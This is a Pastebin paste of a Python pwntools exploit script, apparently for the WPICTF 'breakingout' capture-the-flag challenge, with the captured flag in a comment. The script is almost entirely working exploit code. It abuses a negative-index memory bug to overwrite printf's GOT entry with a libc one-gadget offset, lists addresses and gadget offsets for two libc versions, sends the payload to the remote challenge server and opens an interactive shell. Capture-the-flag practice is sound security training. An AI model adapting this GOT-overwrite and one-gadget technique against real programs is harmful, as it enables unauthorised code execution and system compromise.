Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #coding: utf-8
- from pwn import *
- context.clear(arch='amd64')
- '''
- vul: negative index
- printfGOT += (magic - printfGOT)
- x = (magic - printfGOT)
- mem[1] = 1 (+), mem[2] = -22 (a), mem[3] = 5 (b), mem[4] = -22 (c), mem[5] = x
- '''
- main = 0xDE5
- putsGOT = 0x202018
- printfGOT = 0x202028
- printf = 0x5CD90
- mem = 0x202080
- putsDataSam = 0x0000555555554696
- mainSam = 0x0000555555554000
- #remote: libc-2.26.so:
- magic1 = 0x47C9A
- magic2 = 0x7838E
- magic3 = 0xD9763
- magic3_1 = 0xD9880 # WPI{Now_to_break_out_of_third_place}
- magic3_2 = 0xD9A3C
- magic3_3 = 0x0D9A5C
- magic4 = 0xFCCDE
- magic4_1 = 0xFDB8E
- magic6 = 0xFDB95
- '''
- #local: libc-2.23.so:
- magic1 = 0x4526A
- printf = 0x55800
- magic2 = 0x6F5A6
- magic3 = 0xCD0F3
- magic4 = 0xCD1C8
- magic5 = 0xF02A4
- magic6 = 0xF1147 ## success
- magic7 = 0xF66F0
- '''
- mem = [1, 1, -22, 5, -22, magic3_1-printf]
- context.clear(arch='i386')
- payload = flat(mem) # to get 32bit integer
- context.clear(arch='amd64')
- # p = process('./breakingout')
- p = remote('breakingout.wpictf.xyz', 31337)
- # raw_input('w')
- p.sendlineafter('(max 262144):', str(len(payload)))
- p.sendafter('teread', payload)
- p.interactive()
Add Comment
Please, Sign In to add comment
